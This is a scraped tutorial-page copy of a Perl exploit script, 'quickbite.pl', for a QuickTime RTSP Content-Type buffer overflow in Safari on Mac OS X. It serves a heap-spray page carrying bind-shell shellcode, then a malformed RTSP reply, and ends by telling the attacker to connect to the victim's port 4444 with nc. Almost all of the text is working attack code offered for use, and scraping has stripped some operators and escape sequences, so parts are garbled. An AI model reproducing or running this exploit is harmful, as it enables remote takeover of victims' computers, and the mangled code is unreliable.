Safari Quicktime_Exploit教程-查字典教程网

#!/usr/bin/perl

# quickbite.pl

# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit

# for Mac OS X (Intel)

# Tested with OS X 10.4.

# On victim, browse to http://server:8080/

# Binds shell on port 4444.

# by krafty

# greets to sk, halvar, grugq, and all the ethnical hackers

# extra thanks to ddz for osx hackery

# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc

# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

# milw0rm and packetstorm rule

# Bring back the days of technotronic and r00tshell! Freedom.

# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:

# "What's worse than biting into an apple and finding a worm?"

# "Finding half a worm".

use Socket;

use IO::Handle;

use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

$html = <<ENDHTML;

var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");

var shellcode = unescape("$shellcode");

shellcode = prefix shellcode;

var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");

do {

spray = spray;

} while(spray.length < 0xc0000);

memory = new Array();

for(i = 0; i < 50; i )

memory[i] = spray shellcode;

var url = "rtsp://" location.host "/x.mp3";

document.write("<EMBED SRC='" url "' TYPE='video/quicktime' AUTOPLAY='true' />");

</script>

ENDHTML

$rtsp_body =

"v=0rn" .

"o=- 16689332712 1 IN IP4 0.0.0.0rn" .

"s=MPEG-1 or 2 Audiorn" .

"i=1.mp3rn" .

"t=0 0rn" .

"a=tool:hellorn" .

"a=type:broadcastrn" .

"a=control:*rn" .

"a=range:npt=0-213.077rn" .

"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .

"a=x-qt-text-inf:1.mp3rn" .

"m=audio 0 RTP/AVP 14rn" .

"c=IN IP4 0.0.0.0rn" .

"a=control:track1rn";

$content_length = length($rtsp_body);

$rtsp_header =

"RTSP/1.0 200 OKrn" .

"CSeq: 1rn" .

"Date: 0x00 :Prn" .

"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .

"Content-Type: $bufrn" .

"Content-Length: $content_lengthrnrn";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";

$| = 1;

my $port = MY_HTTP_PORT;

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";

setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";

my $my_addr = sockaddr_in($port,INADDR_ANY);

bind(SOCK,$my_addr) or die "bind() failed: $!";

listen(SOCK,SOMAXCONN) or die "listen() failed: $!";

warn "waiting for incoming connections on port $port...n";

$repeat = 1;

$victim = inet_aton("0.0.0.0");

while($repeat) {

next unless my $remote_addr = accept(SESSION,SOCK);

my ($port,$hisaddr) = sockaddr_in($remote_addr);

warn "Connection from [",inet_ntoa($hisaddr),",$port]n";

$victim = $hisaddr;

SESSION->autoflush(1);

$request = "";

while(<SESSION>) {

$request_line = $_;

$request .= $request_line;

chomp($request_line);

if($request_line =~ /DESCRIBE rtsp/) {

$repeat = 0;

}

$x = length($request_line);

if($x <= 1) {

last;

}

print STDERR $request;

if($repeat) {

print SESSION $http_header . $html;

}

else {

print SESSION $rtsp;

}

warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";

close SESSION;

}

print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";

print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";